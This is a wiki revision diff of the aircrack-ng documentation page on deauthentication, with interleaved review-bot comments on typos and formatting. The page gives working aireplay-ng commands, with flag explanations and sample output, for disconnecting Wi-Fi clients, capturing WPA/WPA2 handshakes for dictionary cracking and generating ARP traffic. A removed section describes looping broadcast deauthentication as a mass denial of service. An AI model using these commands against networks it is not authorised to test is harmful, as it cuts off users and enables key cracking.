deauthentication

Differences

This shows you the differences between two versions of the page.

deauthentication [2007/01/26 19:19]
darkaudax update for v0.7 and expand
deauthentication [2010/11/21 13:34] (current)
sleek typos
Line 1: Line 1:
 ====== Deauthentication ====== ====== Deauthentication ======
  
-=====  ​Usage ​=====+===== Description ​===== 
 +This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. ​ Disassociating clients can be done for a number of reasons:
  
-    * Recovering a hidden ​(not broadcasted) ​ESSID +    * Recovering a hidden ESSID.  This is an ESSID which is not being broadcast. ​ Another term for this is "​cloaked"​. 
-    * Capturing WPA handshakes by forcing clients to reauthenticate+    * Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
     * Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected) ​     * Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected) ​
  
 +Of course, this attack is totally useless if there are no associated wireless client or on fake authentications.
  
-Of course, this attack ​is totally useless ​if there are no associated wireless ​clients.\\ +=====  Usage ===== 
-It is usually more effective ​to target ​specific station using the -c parameter.+ 
 +   ​aireplay-ng -0 1 -a 00:​14:​6C:​7E:​40:​80 -c 00:​0F:​B5:​34:​30:​30 ath0 
 + 
 +Where: 
 +  * -0 means deauthentication 
 +  * 1 is the number of deauths to send (you can send multiple ​if you wish); 0 means send them continuously 
 +  * -a 00:​14:​6C:​7E:​40:​80 is the MAC address of the access point 
 +  * -c 00:​0F:​B5:​34:​30:​30 is the MAC address of the client to deauthenticate;​ if this is omitted then all clients ​are deauthenticated 
 +  *ath0 is the interface name 
 + 
 +===== Usage Examples ===== 
 + 
 +==== Typical Deauthentication ==== 
 +First, you determine a client which is currently connected You need the MAC address for the following command: 
 + 
 +   ​aireplay-ng -0 1 -a 00:​14:​6C:​7E:​40:​80 -c 00:​0F:​B5:​AE:​CE:​9D ath0 
 + 
 +Where: 
 +  * -0 means deauthentication 
 +  * 1 is the number of deauths ​to send (you can send multiple if you wish) 
 +  * -00:​14:​6C:​7E:​40:​80 is the MAC address of the access point 
 +  * -c 000:​0F:​B5:​AE:​CE:​9D is the MAC address of the client you are deauthing 
 +  * ath0 is the interface name 
 + 
 +Here is typical output: 
 + 
 +   ​12:​35:​25 ​ Waiting for beacon frame (BSSID: 00:​14:​6C:​7E:​40:​80) on channel 9 
 +   ​12:​35:​25 ​ Sending 64 directed DeAuthSTMAC: [00:​0F:​B5:​AE:​CE:​9D] [ 61|63 ACKs] 
 + 
 +For directed deauthentications,​ aireplay-ng sends out a total of 128 packets for each deauth you specify. ​ 64 packets are sent to the AP itself and 64 packets are sent to the client. 
 + 
 +Here is what the "[ 61|63 ACKs]" means: 
 + 
 +  * [ ACKs received from the client | ACKs received from the AP ] 
 +  * You will notice that the number in the example above is lower then 64 which is the number of packets sent.  It is not unusual to lose a few packets. ​ Conversely, if the client was actively communicating at the time, the counts could be greater then 64. 
 +  * How do you use this information? ​ This gives you a good indication if the client and or AP heard the packets you sent.  A zero value definitely tells the client and/or AP did not hear your packets. ​ Very low values likely indicate you are quite a distance and the  signal strength is poor. 
 + 
  
  
-===== WPA Handshake capture with an Atheros ​=====+==== WPA/WPA2 Handshake capture with an Atheros ====
  
   airmon-ng start ath0   airmon-ng start ath0
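Review bot: In the "Typical Deauthentication" parameter list, the two MAC entries do not match the command shown above them: "-00:14:6C:7E:40:80" is missing the flag letter and "-c 000:0F:B5:AE:CE:9D" has an extra leading zero. They should read "-a 00:14:6C:7E:40:80" and "-c 00:0F:B5:AE:CE:9D". Elsewhere in this hunk, the new Description says the tool sends "disassocate packets" (a typo for "disassociate") while every other added line speaks of deauthentication, so one term should be used throughout. The trailing "or on fake authentications" in the "totally useless" sentence does not parse and needs rewording, "currently connected You need" is missing a full stop, and "lower then 64" and "greater then 64" should use "than".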
Line 20: Line 58:
   aircrack-ng -w /​path/​to/​dictionary out.cap   aircrack-ng -w /​path/​to/​dictionary out.cap
  
-Here the explaination ​of the above commands:+Explanation ​of the above:
  
-airodump-ng -c 6 --bssid 00:​14:​6C:​7E:​40:​80 -w out ath0+airodump-ng -c 6 --bssid 00:​14:​6C:​7E:​40:​80 -w out ath0\\
 Where: Where:
   *-c 6 is the channel to listen on   *-c 6 is the channel to listen on
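Review bot: The airodump-ng line now ends in a forced line break ("\\") but is still rendered as body text, while every other command on the page is an indented code line. Indenting it like the command block above would keep the repeated command visually distinct from the "Where:" list and would make the "\\" unnecessary.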
Line 29: Line 67:
   *ath0 is the interface name   *ath0 is the interface name
  
-aireplay-ng -0 5 -a 00:​14:​6C:​7E:​40:​80 -c 00:​0F:​B5:​AB:​CB:​9D ath0+aireplay-ng -0 5 -a 00:​14:​6C:​7E:​40:​80 -c 00:​0F:​B5:​AB:​CB:​9D ath0\\
 Where: Where:
   *-0 means deauthentication attack   *-0 means deauthentication attack
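Review bot: The first bullet under this aireplay-ng line still reads "-0 means deauthentication attack", while the parameter lists this revision adds under Usage and Typical Deauthentication read "-0 means deauthentication". Since the revision otherwise only touches the command line here, it is a good moment to use one wording in all three lists, and to give these bullets the same "* -0" spacing as the new lists instead of "*-0".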
Line 45: Line 83:
    ​12:​55:​58 ​ Sending DeAuth to station ​  -- STMAC: [00:​0F:​B5:​AB:​CB:​9D]    ​12:​55:​58 ​ Sending DeAuth to station ​  -- STMAC: [00:​0F:​B5:​AB:​CB:​9D]
  
- +==== ARP request generation with a Prism2 card ====
-===== ARP request generation with a Prism2 card =====+
  
   airmon-ng start wlan0   airmon-ng start wlan0
-  airodump-ng ​wlan0 out 6  (switch to another console)+  airodump-ng ​-c -w out --bssid 00:​13:​10:​30:​24:​9C wlan0  ​(switch to another console)
   aireplay-ng -0 10 -a 00:​13:​10:​30:​24:​9C wlan0   aireplay-ng -0 10 -a 00:​13:​10:​30:​24:​9C wlan0
   aireplay-ng -3 -b 00:​13:​10:​30:​24:​9C -h 00:​09:​5B:​EB:​C5:​2B wlan0   aireplay-ng -3 -b 00:​13:​10:​30:​24:​9C -h 00:​09:​5B:​EB:​C5:​2B wlan0
  
-After sending the five batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.+After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.
  
 If the driver is [[http://​www.linux-wlan.com/​linux-wlan|wlan-ng]],​ you should run the [[airmon-ng]] script (unless you know what to type) otherwise the card won't be correctly setup for injection. If the driver is [[http://​www.linux-wlan.com/​linux-wlan|wlan-ng]],​ you should run the [[airmon-ng]] script (unless you know what to type) otherwise the card won't be correctly setup for injection.
  
-===== Mass denial-of-service with RT2500 ​card =====+===== Usage Tips ===== 
 + 
 +It is usually more effective to target a specific station using the -c parameter. 
 + 
 +The deauthentication packets are sent directly from your PC to the clients. ​ So you must be physically close enough to the clients for your wireless card transmissions to reach them. 
 + 
 + 
 +===== Usage Troubleshooting ===== 
 + 
 +===== Why does deauthentication not work? ===== 
 + 
 +There can be several reasons and one or more can affect you: 
 + 
 +  * You are physically too far away from the client(s). ​ You need enough transmit power for the packets to reach and be heard by the clients. ​ If you do full packet capture, each packet sent to the client should result in an "​ack"​ packet back.  This means the client heard the packet. ​ If there is no "​ack"​ then likely it did not receive the packet. 
 +  * Wireless cards work in particular modes such b, g, n and so on.  If your card is in a different mode then the client card there is good chance that the client will not be able to correctly receive your transmission. ​ See the previous item for confirming the client received the packet. 
 +  * Some clients ignore broadcast deauthentications. ​ If this is the case, you will need to send a deauthentication directed at the particular client. 
 +  * Clients may reconnect too fast for you to see that they had been disconnected. ​ If you do a full packet capture, you will be able to look for the reassociation packets in the capture to confirm deauthentication worked. 
 + 
 + 
 +===== General ​=====
  
-  airmon-ng start ra0 +See the general aireplay-ng troubleshooting ideas: [[aireplay-ng#​usage_troubleshooting|aireplay-ng usage troubleshooting]].
-  ​aireplay-ng -0 0 -a 00:​13:​10:​30:​24:​9C ra0+
  
-With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus preventing clients from staying connected. Sadly, the most up-to-date drivers and firmwares ignore deauthentications sent to broadcasts, so you need to send them directly to them using the -c option as described above. 
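Review bot: The rewritten airodump-ng line in the Prism2 example, "airodump-ng -c -w out --bssid 00:13:10:30:24:9C wlan0", gives -c with no channel value after it. The line it replaces specified channel 6, so the value appears to have been dropped in the rewrite and should be restored ("-c 6 -w out ..."). Separately, "Why does deauthentication not work?" and "General" are added at the same heading level as "Usage Troubleshooting" (five equals signs) although they read as its subsections, so they should be one level down, as the Usage Examples subsections are. In the troubleshooting bullets, "such b, g, n" should be "such as b, g, n" and "a different mode then the client card" should use "than".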
deauthentication.1169835562.txt.gz · Last modified: 2007/01/26 19:19 (external edit)